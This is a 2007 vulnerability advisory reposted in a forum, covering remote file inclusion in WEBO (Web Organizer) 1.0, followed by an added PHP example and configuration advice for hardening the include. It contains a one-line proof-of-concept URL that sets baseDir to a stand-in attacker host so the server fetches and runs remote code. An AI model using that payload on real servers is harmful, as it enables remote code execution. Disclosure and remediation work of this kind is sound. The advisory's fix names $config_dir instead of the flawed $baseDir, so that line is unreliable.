Ras Posted May 10, 2007

Author : M.Hasran Addahroni
Web : http://echo.or.id/adv/adv67-K-159-2007.txt
Critical Lvl : Dangerous

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : WEBO (Web Organizer)
Version : 1.0
Vendor : http://sourceforge.net/projects/weborganizer/
Description :
WEBO (Web Organizer) is an open-source Web application suite providing a groupware calendar, a personal address book, a shared contacts directory, and a personal desktop page.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~
- Invalid include function at modules/abook/foldertree.php :

---------------foldertree.php--------------------------------------
<?php
/* memento :
   TreeFolder( $label, $url="", $target="", $icon = "", $id="", $options="" )
   TreeItem( $label, $url, $target="", $icon="", $options="" )
*/
include_once( "$baseDir/lib/HTML/tree.php");
...
------------------------------------------------------------------

The variable $baseDir is not properly sanitized.
When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple PHP injection script.

Poc/Exploit:
~~~~~~~~~~~~
http://www.target.com/[webo_path]/modules/abook/foldertree.php?baseDir==http://attacker.com/evil?

Solution:
~~~~~~~~~
- Sanitize variable $config_dir on affected files.
- Turn off register_globals
---------------------------------------------------------------------------
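The root cause in the advisory is that `$baseDir` is an ordinary global which, under `register_globals=on`, any request parameter can set, and `include_once` will then follow whatever path or URL it holds. The following is an added example, not WEBO's code and not part of the original post: it shows the advisory's include pattern next to a hardened form that derives the application root from the file's own location and refuses anything that resolves outside the `lib/` directory. It assumes the layout the advisory implies (`<app root>/modules/abook/foldertree.php` and `<app root>/lib/HTML/tree.php`), PHP 7.0 or later for the two-argument `dirname()`, and that `safeLibPath` is a hypothetical helper name chosen here.

```php
<?php
// Added example, not WEBO's code. Assumed layout:
//   <app root>/modules/abook/foldertree.php   (this file)
//   <app root>/lib/HTML/tree.php              (the library being included)

// The pattern from the advisory. With register_globals=on a request parameter
// named "baseDir" becomes the global $baseDir before this line runs, and with
// allow_url_fopen=on the include can fetch and execute a remote file:
//
//     include_once( "$baseDir/lib/HTML/tree.php");

// Hardened form: never take the application root from anything a request can
// influence. This file's own location on disk is not attacker controlled.
// Assigning unconditionally also overrides any value register_globals injected.
$appRoot = dirname(__DIR__, 2);   // modules/abook -> modules -> <app root>

/**
 * Resolve a library file below <app root>/lib and return its canonical path.
 * realpath() returns false for URL wrappers and non-existent files, and the
 * prefix check rejects "..", symlinks and anything else that leaves lib/.
 */
function safeLibPath(string $appRoot, string $relative): string
{
    $libDir = realpath($appRoot . '/lib');
    $target = realpath($appRoot . '/lib/' . $relative);

    if ($libDir === false || $target === false) {
        throw new RuntimeException('library path does not resolve: ' . $relative);
    }

    // Require $target to start with "<libDir>/" so a sibling such as
    // "<app root>/lib-evil" cannot pass a bare prefix match.
    $prefix = $libDir . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('refusing to include outside lib/: ' . $relative);
    }

    return $target;
}

include_once safeLibPath($appRoot, 'HTML/tree.php');
```

The code change removes the dependency on a request-settable global; the configuration change the advisory recommends (`register_globals = Off`, and on modern PHP `allow_url_include = Off`, which is the default) is still worth applying so that other files with the same pattern are not left exposed. `register_globals` was removed in PHP 5.4, so the example's defensive assignment matters most on the legacy installs this advisory targets.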